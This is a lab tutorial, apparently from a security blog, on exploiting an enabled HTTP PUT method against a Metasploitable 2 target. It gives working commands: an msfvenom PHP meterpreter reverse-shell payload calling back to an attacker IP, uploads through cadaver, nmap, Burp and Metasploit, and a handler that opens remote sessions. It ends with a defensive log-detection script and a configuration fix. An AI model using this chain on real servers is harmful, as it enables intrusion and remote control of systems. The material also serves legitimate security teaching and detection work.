Today's article covers exploiting an enabled HTTP PUT method through various techniques. In the previous article we went through the different actions performed by HTTP methods, where I described the role of the PUT method, which allows a client to upload a file to the server. Now I will take advantage of this method to upload a malicious file and compromise the server.
Target: Metasploitable 2
Attacker: Kali Linux
Let’s Begin!!!!
Boot up your Kali Linux, open Firefox, type the victim IP 192.168.1.4 in the URL bar and click on WEBDAV. Here you can see it is showing only the parent directory. Now open a terminal to execute the following commands.
First of all, make sure the PUT method is allowed by the HTTP server. To confirm this we scan the target with nikto:
nikto -h http://192.168.1.4/dav/
The highlighted part shows that the PUT method is allowed. Now it is time to hack the server by uploading a malicious PHP file using the following techniques.
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.5 lport=4444 -f raw
Copy the code from
Now load the Metasploit framework by typing msfconsole in a new terminal and start multi/handler.
Cadaver
Cadaver comes installed in Kali; it is a command-line tool that supports uploading and downloading files over WebDAV.
Type the host URL where you want to upload your file using the first command given below.
cadaver http://192.168.1.4/dav/
Now you are inside the victim's directory. Upload shell.php here by executing the command below; together these two commands upload your file to the target machine.
put /root/Desktop/shell.php
msf> use exploit/multi/handler
msf exploit(handler) > set lport 4444
msf exploit(handler) > set lhost 192.168.1.5
msf exploit(handler) > set payload php/meterpreter/reverse_tcp
msf exploit(handler) > exploit
meterpreter > sysinfo
It will give you a meterpreter session.
Nmap
The http-put NSE script uploads a local file to a remote web server using the HTTP PUT method. You must specify the filename and URL path with NSE arguments. Prepare the malicious file nmap.php that you want to upload.
nmap -p 80 192.168.1.4 --script http-put --script-args http-put.url='/dav/nmap.php',http-put.file='/root/Desktop/nmap.php'
The result shows that nmap.php was uploaded successfully; now let's check it.
Again type the same URL in the browser, 192.168.1.4/dav, and load it. Yes, we have got our file nmap.php on the web server.
At the same time, open Metasploit and use multi/handler; then go back to the uploaded nmap.php file and run it.
It will also give you a meterpreter session.
Poster
Install the Poster plug-in from Firefox add-ons. Poster lets you perform HTTP requests with methods such as GET, POST, PUT and DELETE. Prepare the malicious file poster.php that you will upload. Click on Tools in the menu bar and then click on Poster in the drop-down menu. The following dialog box will open. Here, type the URL as shown in the screenshot, browse to the file that you will upload and click on the PUT option. This shows that the PUT method is allowed, which means you can upload through it.
As before, run multi/handler, then go back to the uploaded poster.php file and click on it. A meterpreter session will open again.
Burpsuite
Now right-click on the intercepted request window in Burp Suite and a list of options will appear. Click on "Send to Repeater".
The GET method is present in the request header, and we need the PUT method to upload a file. Here I am going to replace this method with PUT. Prepare the malicious file burp.php that you need to upload.
Metasploit
This module can abuse misconfigured web servers to upload and delete web content via PUT and DELETE HTTP requests. Set ACTION to either PUT or DELETE; PUT is the default. If FILENAME isn't specified, the module will generate a random string for you as a .txt file. If DELETE is used, a filename is required.
msf > use auxiliary/scanner/http/http_put
msf auxiliary(http_put) > set rhosts 192.168.1.4
msf auxiliary(http_put) > set payload php/meterpreter/reverse_tcp
msf auxiliary(http_put) > set path /dav/
msf auxiliary(http_put) > set filename meta.php
msf auxiliary(http_put) > set filedata file:/root/Desktop/meta.php
msf auxiliary(http_put) > exploit
Open the same URL in the browser, 192.168.1.4/dav. Last but not least, we have once again got our file meta.php on the web server, which means the message "the upload probably failed" printed by Metasploit is not true.
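Every technique above leaves the same trace on the server side: a write-method request into /dav/ that the server answered with 201 or 204, regardless of what the client tool reported (as the "upload probably failed" message shows, the server log is the ground truth). The following is an added defender-side example, not part of the original article: a small Python detector that scans Apache combined-format access-log lines for successful PUT/MOVE/COPY/MKCOL requests under the WebDAV prefix and rates uploads with a server-executable extension as high severity. The log lines, IPs and user-agent strings are constructed for the example.

```python
import posixpath
import re
from urllib.parse import unquote

# Apache "combined" log format; the sample lines below are constructed for this example.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) \S+(?: "[^"]*" "(?P<ua>[^"]*)")?'
)
WRITE_METHODS = {"PUT", "MOVE", "COPY", "MKCOL"}          # WebDAV methods that create content
EXEC_EXT = (".php", ".php3", ".php5", ".phtml", ".phar")  # extensions the server would execute
SUCCESS = {"200", "201", "204"}                           # 201 = created, 204 = overwritten

def parse_line(line):
    """Parse one access-log line into a dict, or None if it is not in combined format."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def find_webdav_uploads(lines, dav_prefix="/dav/"):
    """Return one alert per successful write-method request into the WebDAV tree.
    Uploads whose target has a server-executable extension are rated 'high'."""
    alerts = []
    for line in lines:
        rec = parse_line(line)
        if not rec or rec["method"] not in WRITE_METHODS:
            continue
        # Decode %xx escapes and collapse "/dav/../" segments before checking the prefix.
        path = posixpath.normpath(unquote(rec["path"].split("?", 1)[0]))
        if not path.startswith(dav_prefix) or rec["status"] not in SUCCESS:
            continue
        severity = "high" if path.lower().endswith(EXEC_EXT) else "medium"
        alerts.append({"time": rec["ts"], "src": rec["ip"], "method": rec["method"],
                       "path": path, "status": rec["status"],
                       "agent": rec["ua"] or "-", "severity": severity})
    return alerts

# Constructed sample log: a cadaver upload, an nmap http-put upload with a %-encoded name,
# a harmless text upload, and a PUT outside /dav/ that the server rejected with 405.
SAMPLE_LOG = [
    '192.168.1.5 - - [10/Mar/2018:14:02:11 +0000] "OPTIONS /dav/ HTTP/1.1" 200 - "-" "Mozilla/5.0 (Nikto)"',
    '192.168.1.5 - - [10/Mar/2018:14:03:40 +0000] "PUT /dav/shell.php HTTP/1.1" 201 274 "-" "cadaver/0.23.3 neon/0.30.2"',
    '192.168.1.5 - - [10/Mar/2018:14:04:02 +0000] "GET /dav/shell.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"',
    '192.168.1.5 - - [10/Mar/2018:14:05:19 +0000] "PUT /dav/nmap%2Ephp HTTP/1.1" 201 274 "-" "Nmap Scripting Engine"',
    '192.168.1.5 - - [10/Mar/2018:14:06:33 +0000] "PUT /dav/notes.txt HTTP/1.1" 204 - "-" "Mozilla/5.0"',
    '192.168.1.5 - - [10/Mar/2018:14:07:01 +0000] "PUT /uploads/x.php HTTP/1.1" 405 - "-" "curl/7.58.0"',
]

if __name__ == "__main__":
    for a in find_webdav_uploads(SAMPLE_LOG):
        print(f'[{a["severity"]}] {a["time"]} {a["src"]} {a["method"]} {a["path"]} -> {a["status"]} ({a["agent"]})')
```

On a real server the same script can be pointed at the live access log; the fix for the finding itself is to remove write methods from the DAV location (for example a `<LimitExcept GET HEAD OPTIONS PROPFIND>` deny in Apache) or to require authentication for them.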